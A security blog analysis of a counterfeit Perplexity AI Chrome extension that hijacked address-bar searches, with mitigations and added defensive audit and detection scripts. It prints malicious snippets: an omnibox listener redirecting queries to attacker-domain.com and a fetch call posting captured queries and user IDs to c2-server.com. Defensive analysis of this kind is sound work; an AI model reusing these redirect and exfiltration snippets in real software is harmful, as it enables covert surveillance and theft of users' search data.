A counterfeit Perplexity AI Chrome extension was discovered intercepting user search queries and address bar inputs, redirecting traffic through attacker-controlled domains. The malicious extension mimicked the legitimate Perplexity AI service, exploiting user trust to harvest browsing data and potentially monetize hijacked searches. Users who installed the fake extension from unofficial sources faced significant privacy risks and data exposure. This incident highlights the ongoing threat of malicious browser extensions targeting popular AI services.
Introduction
Browser extensions have become a prime vector for cybercriminals seeking to compromise user data and manipulate web traffic. In a recent campaign, threat actors developed a fraudulent Chrome extension impersonating Perplexity AI—a popular AI-powered search engine. The malicious extension intercepted search queries entered directly into Chrome’s address bar (omnibox) and redirected users through attacker-controlled infrastructure.
Unlike traditional adware that simply injects advertisements, this extension operated as a sophisticated search hijacker, capturing real-time user inputs before they reached legitimate search providers. The attack demonstrates how cybercriminals leverage brand recognition of trending AI services to distribute malware and monetize stolen traffic through affiliate schemes and data collection.
This analysis examines the technical mechanisms employed by the malicious extension, the risks it posed to affected users, and defensive measures to prevent similar compromises.
Background & Context
Perplexity AI has gained significant popularity as an alternative search interface powered by large language models. As with any trending technology, threat actors quickly recognized an opportunity to exploit user interest through malicious impersonation.
Browser extension-based threats have evolved considerably in recent years. Modern malicious extensions employ sophisticated techniques including:
- Permission abuse: Requesting broad access to browsing data under legitimate-sounding pretexts
- Brand impersonation: Copying logos, names, and descriptions of popular services
- Traffic monetization: Redirecting searches through affiliate networks or selling harvested data
- Persistence mechanisms: Making removal difficult through multiple installation hooks
The Chrome Web Store implements security measures to prevent malicious extensions, but threat actors frequently circumvent these protections by distributing malware through third-party websites, phishing campaigns, and social engineering tactics. Users seeking free access to premium features or early releases often download extensions from untrusted sources, creating attack opportunities.
Search hijacking specifically represents a lucrative threat vector. By intercepting and redirecting search queries, attackers can:
- Earn affiliate commissions from sponsored search results
- Harvest valuable data about user interests and behavior
- Inject malicious results or phishing links
- Profile users for targeted attacks
Technical Breakdown
The malicious Perplexity extension implemented several technical mechanisms to intercept and exfiltrate user data:
Manifest Permissions
The extension requested excessive permissions in its manifest file, including:
{
  "permissions": [
    "tabs",
    "webNavigation",
    "webRequest",
    "webRequestBlocking",
    "*://*/*"
  ]
}

These permissions granted the extension:
- Access to all websites (*://*/*)
- Ability to monitor navigation events
- Power to intercept and modify web requests
- Capability to read and alter tab content
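An audit script, added here as an example and not part of the original write-up, that walks a Chrome profile's Extensions directory and flags manifests combining broad host patterns with interception permissions, an omnibox keyword, or a brand name whose homepage_url does not match the real vendor. The brand table, the sample manifest and the domain in it are constructed assumptions.

```python
import json
from pathlib import Path

# Host patterns granting access to every site (MV2 "permissions" or MV3 "host_permissions").
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Permissions that, together with broad host access, allow traffic interception or rewriting.
INTERCEPT_PERMS = {"webRequest", "webRequestBlocking", "webNavigation", "tabs", "declarativeNetRequest"}
WATCHED_BRANDS = {"perplexity": "perplexity.ai"}  # brand keyword -> legitimate domain (assumption)

def audit_manifest(manifest):
    """Return human-readable findings for one extension manifest (empty list if nothing notable)."""
    findings = []
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    broad = perms & BROAD_HOSTS
    if broad:
        findings.append(f"broad host access: {sorted(broad)}")
    intercept = perms & INTERCEPT_PERMS
    if broad and intercept:
        findings.append(f"can intercept or rewrite traffic on all sites: {sorted(intercept)}")
    if "omnibox" in manifest:
        findings.append(f"registers omnibox keyword {manifest['omnibox'].get('keyword')!r}")
    name, homepage = manifest.get("name", "").lower(), manifest.get("homepage_url", "")
    for brand, domain in WATCHED_BRANDS.items():
        if brand in name and domain not in homepage:
            findings.append(f"name claims '{brand}' but homepage_url is {homepage or 'missing'}")
    return findings

def scan_profile(profile_dir):
    """Audit every <profile>/Extensions/<id>/<version>/manifest.json; return {extension_id: findings}."""
    results = {}
    for manifest_path in Path(profile_dir, "Extensions").glob("*/*/manifest.json"):
        ext_id = manifest_path.parent.parent.name
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError) as exc:
            results[ext_id] = [f"unreadable manifest: {exc}"]
            continue
        findings = audit_manifest(manifest)
        if findings:
            results[ext_id] = findings
    return results

# Constructed sample modelled on the manifest fragment in the write-up (not a real extension).
FAKE_PERPLEXITY_MANIFEST = {
    "name": "Perplexity AI Search",
    "permissions": ["tabs", "webNavigation", "webRequest", "webRequestBlocking", "*://*/*"],
    "omnibox": {"keyword": "p"},
    "homepage_url": "https://attacker-domain.example",
}
```

Point scan_profile at a profile directory such as ~/.config/google-chrome/Default to audit a real installation.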
Omnibox Hijacking
The extension registered as an omnibox handler, intercepting queries entered directly into Chrome’s address bar. When users typed searches, the extension captured input before transmission to the default search engine:
chrome.omnibox.onInputEntered.addListener(function(text) {
  var redirectUrl = "https://attacker-domain.com/search?q=" + encodeURIComponent(text);
  chrome.tabs.update({url: redirectUrl});
});

This mechanism allowed complete interception of organic search behavior without visible modification to the browser interface.
Traffic Redirection
Captured searches were redirected through a chain of attacker-controlled domains:
- Initial redirect to data collection endpoint
- Logging of search query, timestamp, and user identifier
- Secondary redirect to legitimate search results (often Bing or Google)
- Affiliate parameters appended to monetize clicks
The redirection chain obscured the malicious activity from casual users while generating revenue for the threat actors:
User Query → Extension Capture → attacker-domain.com/track
→ affiliate-network.com/?ref=XXXXX → search-engine.com/results

Data Exfiltration
The extension transmitted collected data to remote servers via encrypted HTTPS requests:
fetch('https://c2-server.com/collect', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({
    query: searchText,      // the captured address bar input
    timestamp: Date.now(),
    uid: userId             // persistent per-install identifier
  })
});

Harvested data included search queries, browsing timestamps, and persistent user identifiers for tracking across sessions.
Impact & Risk Assessment
Immediate Risks
Privacy Violation: All search queries and address bar inputs were captured and transmitted to attacker infrastructure. This included potentially sensitive searches related to health, finances, personal relationships, and confidential business matters.
Data Monetization: Stolen search data could be sold to data brokers, used for targeted advertising, or leveraged for social engineering attacks against high-value targets.
Credential Exposure: Users entering credentials or sensitive information directly into the address bar (a common mistake) exposed this data to the attackers.
Secondary Threats
Profile Development: Continuous monitoring enabled attackers to build comprehensive behavioral profiles, mapping interests, schedules, and online habits.
Supply Chain Risk: Organizations whose employees installed the extension potentially exposed corporate search patterns and competitive intelligence.
Future Targeting: Harvested data provided foundation for subsequent spear-phishing campaigns or account compromise attempts.
Affected Population
While precise infection numbers remain unknown, indicators suggest hundreds to potentially thousands of installations before detection. Users who downloaded the extension from third-party software repositories, tutorial sites, or through search result poisoning faced exposure.
Vendor Response
Perplexity AI issued public warnings about the fraudulent extension, emphasizing they do not currently offer an official Chrome extension. The company established verification channels for users to confirm legitimate products and reported the malicious extension to Google’s security team.
Google’s Chrome Web Store security team investigated reports and confirmed the extension was distributed outside official channels. Since the malicious software never appeared in the legitimate Chrome Web Store, takedown focused on identifying and neutralizing the distribution infrastructure.
Domain registrars received abuse complaints for the command-and-control servers and redirect domains involved in the operation. Several domains were subsequently suspended, disrupting the attacker’s monetization infrastructure.
Law enforcement notification was initiated through appropriate channels, though attribution remains under investigation. The operation’s relatively sophisticated technical implementation suggests involvement of experienced cybercriminals rather than opportunistic actors.
Mitigations & Workarounds
Immediate Actions for Affected Users
Remove the Extension:
- Navigate to chrome://extensions/
- Enable “Developer mode” to view all extensions
- Locate any Perplexity-related extensions
- Click “Remove” and confirm deletion
Clear Browser Data:
Settings → Privacy and Security → Clear Browsing Data
Select: Cookies, Cache, Site Settings
Time Range: All Time

Reset Search Engine Settings:
Settings → Search Engine → Manage Search Engines
Remove unknown or suspicious entries
Restore preferred default search engine

Change Compromised Credentials: Any passwords or sensitive information entered during the infection period should be changed immediately, prioritizing financial accounts and email.
Verification Steps
Confirm removal by checking:
# Check Chrome's Secure Preferences file for leftover extension entries (macOS path shown;
# on Linux the profile lives under ~/.config/google-chrome/Default/)
grep -i perplexity ~/Library/Application\ Support/Google/Chrome/Default/Secure\ Preferences

No results should appear if the extension was fully removed.
Detection & Monitoring
Endpoint Monitoring
Security teams should monitor for indicators including:
Suspicious Extension Installation:
- Extensions with excessive permissions
- Software installed from non-standard sources
- Extensions mimicking popular AI services
Network Traffic Patterns:
- Outbound HTTPS POST requests to unknown domains
- Frequent connections to recently-registered domains
- Traffic patterns correlating with user search behavior

Registry and File System Changes (Windows):
HKEY_CURRENT_USER\Software\Google\Chrome\Extensions
Check for unauthorized extension IDs

Enterprise Controls
Organizations should implement:
- Extension Whitelisting: Chrome Enterprise policy restricting installations to approved extensions
- DNS Filtering: Block known malicious domains associated with the campaign
- Endpoint Detection Rules: Alert on suspicious extension installations
- User Education: Training on verifying extension authenticity
Behavioral Indicators
Monitor for:
- Unexpected search result redirections
- Modified address bar behavior
- Increased latency in search operations
- Unknown domains appearing in network logs
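Added example, not from the original write-up: detection logic that reconstructs 3xx redirect chains per client from proxy log lines and flags a search query that passes through non-search-engine hosts before landing on a known engine, the pattern described under Traffic Redirection. The log format, domains, client addresses and uid value are constructed.

```python
from urllib.parse import urlparse, parse_qs

# Search engines a hijacked query is expected to land on (extend for your environment).
KNOWN_SEARCH = {"www.bing.com", "www.google.com", "duckduckgo.com"}

def parse_line(line):
    """Constructed proxy format: '<ts> <client> <method> <url> <status> <location|->'."""
    ts, client, method, url, status, location = line.split()
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": int(status), "location": None if location == "-" else location}

def query_of(url):
    """Return the 'q' parameter of a URL, or None if absent."""
    return parse_qs(urlparse(url).query).get("q", [None])[0]

def find_hijack_chains(lines):
    """Follow 3xx Location hops per client and flag chains that carry a search
    query through non-search-engine hosts before landing on a known search engine."""
    by_client = {}
    for raw in lines:
        if raw.strip():
            e = parse_line(raw)
            by_client.setdefault(e["client"], []).append(e)
    alerts = []
    for client, evs in by_client.items():
        consumed = set()  # URLs already reached as a hop of an earlier chain
        for i, start in enumerate(evs):
            q = query_of(start["url"])
            if q is None or start["url"] in consumed or urlparse(start["url"]).netloc in KNOWN_SEARCH:
                continue
            chain, cur = [start["url"]], start
            while cur["status"] in (301, 302, 307, 308) and cur["location"]:
                nxt = next((e for e in evs[i + 1:] if e["url"] == cur["location"]), None)
                if nxt is None:
                    break
                chain.append(nxt["url"])
                consumed.add(nxt["url"])
                cur = nxt
            hosts = [urlparse(u).netloc for u in chain]
            if len(chain) > 1 and hosts[-1] in KNOWN_SEARCH and query_of(chain[-1]) == q:
                alerts.append({"client": client, "query": q, "hosts": hosts})
    return alerts

# Constructed sample log modelling the chain in the write-up (domains and uid are placeholders).
SAMPLE_LOG = """
1700000000 10.0.0.5 GET https://attacker-domain.example/track?q=quarterly+revenue+forecast&uid=abc123 302 https://affiliate-network.example/?ref=XXXXX&q=quarterly+revenue+forecast
1700000001 10.0.0.5 GET https://affiliate-network.example/?ref=XXXXX&q=quarterly+revenue+forecast 302 https://www.bing.com/search?q=quarterly+revenue+forecast
1700000001 10.0.0.5 GET https://www.bing.com/search?q=quarterly+revenue+forecast 200 -
""".strip().splitlines()
```

Running find_hijack_chains(SAMPLE_LOG) yields one alert for 10.0.0.5 showing the query routed attacker-domain.example -> affiliate-network.example -> www.bing.com.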
Best Practices
Extension Security Hygiene
Verify Before Installing:
- Only download extensions from official Chrome Web Store
- Confirm developer identity matches legitimate vendor
- Review permissions requested against actual functionality
- Check user reviews and installation counts
Regular Audits:
Periodically review installed extensions:
chrome://extensions/
Disable unused extensions
Remove unfamiliar software
Verify all extensions remain necessary

Permission Awareness:
Be suspicious of extensions requesting:
- Access to all websites
- Ability to read and modify data
- Network interception capabilities
- Background execution permissions
Organizational Controls
Chrome Enterprise Policies (the older ExtensionInstallBlacklist/ExtensionInstallWhitelist policy names are deprecated; current Chrome uses the names below):
{
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionInstallAllowlist": [
    "approved-extension-id-1",
    "approved-extension-id-2"
  ],
  "ExtensionInstallForcelist": [
    "security-extension-id"
  ]
}

Security Awareness Training:
- Educate users about extension risks
- Establish approval processes for new extensions
- Provide channels for reporting suspicious software
- Simulate extension-based phishing scenarios
Personal Security Measures
- Enable Chrome Sync with strong authentication to backup legitimate settings
- Use password managers instead of typing credentials into address bar
- Implement two-factor authentication on critical accounts
- Subscribe to security advisories for frequently-used services
Key Takeaways
🔴 Brand Impersonation Remains Effective: Threat actors successfully exploited Perplexity AI’s popularity to distribute malware, demonstrating the continued effectiveness of impersonation attacks.
🔴 Browser Extensions Pose Significant Risk: Extensions with broad permissions can compromise all browsing activity, making them high-value targets for attackers.
🔴 Search Hijacking Enables Monetization: Intercepted search traffic generates revenue through affiliate schemes while harvesting valuable user data.
🔴 Official Distribution Channels Are Critical: Installing software from unofficial sources dramatically increases compromise risk.
🔴 Detection Requires Active Monitoring: Malicious extensions often operate silently, requiring deliberate verification to identify.
🔴 Privacy Impact Extends Beyond Immediate Theft: Harvested search data enables long-term profiling and future targeted attacks.
Organizations and individuals must treat browser extensions as critical security components requiring careful vetting, ongoing monitoring, and regular audits. The intersection of AI service popularity and extension distribution creates persistent opportunities for threat actors that demand heightened vigilance.
Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.